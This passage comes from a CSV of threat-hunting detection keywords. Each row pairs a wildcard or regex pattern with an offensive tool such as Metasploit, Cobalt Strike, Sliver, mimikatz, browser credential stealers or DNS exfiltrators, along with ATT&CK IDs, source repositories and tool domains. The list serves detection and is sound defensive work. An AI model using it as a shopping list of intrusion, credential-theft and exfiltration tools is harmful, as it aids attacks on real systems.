security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*meterpreter_loader*",".{0,1000}meterpreter_loader.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*METERPRETER_STAGER*",".{0,1000}METERPRETER_STAGER.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*meterpreter-in-go.exe*",".{0,1000}meterpreter\-in\-go\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*MeteTool*",".{0,1000}MeteTool.{0,1000}","offensive_tool_keyword","MeteTool","Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.","T1059.003 - T1064 - T1135 - T1059.007","TA0002 - TA0003 - 
TA0004","N/A","N/A","Defense Evasion","https://github.com/S-S-X/metatool","1","0","N/A","N/A","1","2","1","2024-03-19T17:29:49Z","2020-05-09T19:09:17Z" "*methodHash*528465795*",".{0,1000}methodHash.{0,1000}528465795.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*methods::dns::dns_exfiltrator*",".{0,1000}methods\:\:dns\:\:dns_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*methods::https::https_exfiltrator*",".{0,1000}methods\:\:https\:\:https_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*methods::icmp::icmp_exfiltrator*",".{0,1000}methods\:\:icmp\:\:icmp_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" 
"*Metro-Holografix/CSExec*",".{0,1000}Metro\-Holografix\/CSExec.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Metro-Holografix/Dinjector*",".{0,1000}Metro\-Holografix\/Dinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*metsrv.dll*",".{0,1000}metsrv\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*metsvc-server.exe*",".{0,1000}metsvc\-server\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","service file name","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metterpreter*",".{0,1000}metterpreter.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","1","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*MFASweep.ps1*",".{0,1000}MFASweep\.ps1.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "*mfgccjchihfkkindfppnaooecgfneiii*",".{0,1000}mfgccjchihfkkindfppnaooecgfneiii.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*mgeeky/PackMyPayload*",".{0,1000}mgeeky\/PackMyPayload.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*mgeeky/RedWarden*",".{0,1000}mgeeky\/RedWarden.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*mgffkfbidihjpoaomajlbgchddlicgpn*",".{0,1000}mgffkfbidihjpoaomajlbgchddlicgpn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" 
"*mhaskar/DNSStager*",".{0,1000}mhaskar\/DNSStager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*mhaskar/Octopus*",".{0,1000}mhaskar\/Octopus.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*mhuzaifi0604/spellbound*",".{0,1000}mhuzaifi0604\/spellbound.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*mhydeath.exe*",".{0,1000}mhydeath\.exe.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*mhydeath-master*",".{0,1000}mhydeath\-master.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" 
"*micahvandeusen/gMSADumper*",".{0,1000}micahvandeusen\/gMSADumper.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","3","224","40","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z" "*Michael Zhmaylo (github.com/*",".{0,1000}Michael\sZhmaylo\s\(github\.com\/.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*micr0 shell.py*",".{0,1000}micr0\sshell\.py.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*micr0_shell-main*",".{0,1000}micr0_shell\-main.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*micr0shell.py *",".{0,1000}micr0shell\.py\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*microbrownys.strangled.net*",".{0,1000}microbrownys\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*MicroBurst.psm1*",".{0,1000}MicroBurst\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-Az.psm1*",".{0,1000}MicroBurst\-Az\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-AzureAD*",".{0,1000}MicroBurst\-AzureAD.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-AzureREST*",".{0,1000}MicroBurst\-AzureREST.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - 
TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-AzureRM*",".{0,1000}MicroBurst\-AzureRM.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-master*",".{0,1000}MicroBurst\-master.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-Misc.psm1*",".{0,1000}MicroBurst\-Misc\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-MSOL*",".{0,1000}MicroBurst\-MSOL.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*microchsse.strangled.net*",".{0,1000}microchsse\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*microlilics.crabdance.com*",".{0,1000}microlilics\.crabdance\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*micronaoko.jumpingcrab.com*",".{0,1000}micronaoko\.jumpingcrab\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*microplants.strangled.net*",".{0,1000}microplants\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Microsoft\Windows\Recent\PrivescCheck*",".{0,1000}Microsoft\\Windows\\Recent\\PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*microsoft-edge/cookies.txt*",".{0,1000}microsoft\-edge\/cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge/credit_cards.txt*",".{0,1000}microsoft\-edge\/credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge/history.txt*",".{0,1000}microsoft\-edge\/history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge/login_data.txt*",".{0,1000}microsoft\-edge\/login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential 
Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge\cookies.txt*",".{0,1000}microsoft\-edge\\cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge\credit_cards.txt*",".{0,1000}microsoft\-edge\\credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge\history.txt*",".{0,1000}microsoft\-edge\\history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge\login_data.txt*",".{0,1000}microsoft\-edge\\login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential 
Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsploit.git*",".{0,1000}microsploit\.git.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","435","135","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "*Midl2Bytes.exe*",".{0,1000}Midl2Bytes\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*--mifi-username * --mifi-password * --number +*",".{0,1000}\-\-mifi\-username\s.{0,1000}\s\-\-mifi\-password\s.{0,1000}\s\-\-number\s\+.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*MIGkAgEBBDBido1KtKSwQah/WIoGkDZDX2WPXdexUVAmi0tf6Pd9vK5pfpt2II*",".{0,1000}MIGkAgEBBDBido1KtKSwQah\/WIoGkDZDX2WPXdexUVAmi0tf6Pd9vK5pfpt2II.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul*",".{0,1000}MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*",".{0,1000}MIIEoQIBAAKCAQEArJqP\/6XFBa88x\/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
"*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*",".{0,1000}MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*",".{0,1000}MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC9ZoKnCHwsOdxe*",".{0,1000}MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC9ZoKnCHwsOdxe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*mimi32.exe *",".{0,1000}mimi32\.exe\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
